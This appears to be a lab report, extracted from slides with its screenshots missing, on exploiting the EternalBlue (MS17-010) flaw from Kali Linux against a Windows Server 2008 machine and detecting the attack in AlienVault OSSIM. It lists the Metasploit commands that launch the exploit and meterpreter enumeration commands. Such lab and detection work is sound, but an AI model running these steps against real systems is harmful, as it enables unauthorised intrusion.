In this report, we explore the exploitation of the EternalBlue Vulnerability by an attacker using Kali Linux. We detail the attacker’s progression from initial access to the execution of privilege escalation techniques, to attain administrative access. With the administrative privilege, the attacker can fully compromise the system, exploring sensitive data, disrupting critical operations, and maintaining persistent access for future attacks.
2. 2
Scenario:
In this report, we explore the exploitation of the EternalBlue Vulnerability by an
attacker using Kali Linux. We detail the attacker’s progression from initial access to
the execution of privilege escalation techniques, to attain administrative access.
With the administrative privilege, the attacker can fully compromise the system,
exploring sensitive data, disrupting critical operations, and maintaining persistent
access for future attacks.
Environment:
Kali Linux (Attacker)
Windows Server 2008 (Victim Machine)
AlienValut Server (AlienValut OSSIM)
AlienVault OSSIM:
AlienVault OSSIM (Open-Source Security Information and Event Management) is a
comprehensive security monitoring and management solution. It offers a unified
approach to threat detection, incident response, and compliance management. Also,
Log Collection and Analysis
Centralized Logging's Role in Threat Detection
Crafting Detection Rules Specific to exploits.
• AlienVault References: https://cybersecurity.att.com/
Steps to Install and Configure AlienVault
1. Download the AlienVault from (https://cybersecurity.att.com/products/ossim)
2. Create a new VM using the downloaded ISO file.
Set the hostname as below;
4. 4
Configure listening interfaces.
Once AlienVault is installed, brings us to the welcome page as below; set you
credentials to proceed further.
Set HIDS and log as per requirement.
5. 5
Once the configuration is completed, will see welcome page as below;
Steps to gain access using EternalBlue vulnerability.
1. Login into Kali Linux and execute msfconsole
6. 6
2. Use the EternalBlue exploit and set the option accordingly.
> use exploit/windows/smb/ms17_010_eternalblue
> show options
> set LHOST attacker_IP
> set RHOST victim_IP
3. Run the exploit using > exploit
7. 7
4. Execute enumeration command to see Victim machine information.
meterpreter> getuid
meterpreter> sysinfo
meterpreter> dir
Steps to detect the exploit. Using AlienVault
Once the exploit is executed, you can see the alerts in AlienValut as below.